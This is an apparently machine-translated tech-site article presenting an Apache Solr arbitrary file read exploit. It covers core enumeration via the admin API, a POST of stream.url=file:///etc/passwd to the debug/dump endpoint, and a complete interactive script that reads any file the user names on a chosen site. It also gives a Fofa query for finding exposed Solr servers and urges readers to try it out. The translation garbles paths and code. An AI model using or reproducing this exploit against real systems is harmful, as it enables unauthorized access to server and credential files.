Shulou(Shulou.com)05/31 Report--

This article mainly explains "how to solve the problem of reading exp from Apache-Solr arbitrary files". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Next let the editor to take you to learn "Apache-Solr arbitrary file reading exp how to solve" it!

Apache-Solr arbitrary file read exp

The way to exploit the vulnerability is very simple, but what is said on the Internet is not very complete.

First, we need to visit:

/ solr/admin/cores?indexInfo=false&wt=json

Then look at the corresponding data:

{"responseHeader": {"status": 0, "QTime": 0, "initFailures": {}, "status": {"ingredients": {"name": "ingredients", "instanceDir": "/ var/solr/data/ingredients", "dataDir": "/ var/solr/data/ingredients/data/", "config": "solrconfig.xml", "schema": "schema.xml" "startTime": "2021-03-18T11:41:26.398Z", "uptime": 211644}}

Something like that, ingredients is what we need.

Construction path:

"/ solr/" .ins. "/ debug/dump?param=ContentStreams&wt=json"

Ins is the name of the instance object we got.

They said they would return the xml format, and those on the Internet do not have wt=json, but I found that dump accepts this parameter and also outputs json format.

And we can determine the server type when we get the ins above.

The above words, uh, should be:

/ solr/ingredients/debug/dump?param=ContentStreams&wt=json

Then there is a post packet, and the path is available, and the content is:

Stream.url= file:///etc/passwd

And then you'll get a json, and there will be no results here.

Finally, exp is attached:

# define insqian = "name": "# define inshou =" # define contentqian = "stream": "# define contenthou ="}] function Getinstance (url) {res = HttpGetSafe (url. "/ solr/admin/cores?indexInfo=false&wt=json", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0") If (StrFindStr (res [0], "initFailures", 0) = "- 1") {return ";} return GettextMiddle (res [0], insqian,inshou);} function GetFileContent (url,ins,FilePath) {res = HttpPostSafe (url." / solr/ ".ins." / debug/dump?param=ContentStreams&wt=json "," stream.url= file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:86.0) Gecko/20100101 Firefox/86.0 "); con = GettextMiddle (res [0], contentqian,contenthou); return StrReplace (con,"\ n ", StrRN ());} function main (args) {print (" Please enter the site for testing: "); url = input (); ins = Getinstance (url) If (ins = = ") {print (" No vulnerabilities ");} else {print (" possible vulnerabilities, instanceName: ".ins.", enter the name of the file to view: "); wb = input () While (wb! = "exit") {print (GetFileContent (url,ins,wb)); wb = input ();}}

Bring an effect picture:

Fofa search:

App= "Apache-Solr" at this point, I believe you have a deeper understanding of "Apache-Solr arbitrary file read exp how to solve", might as well to practical operation it! Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.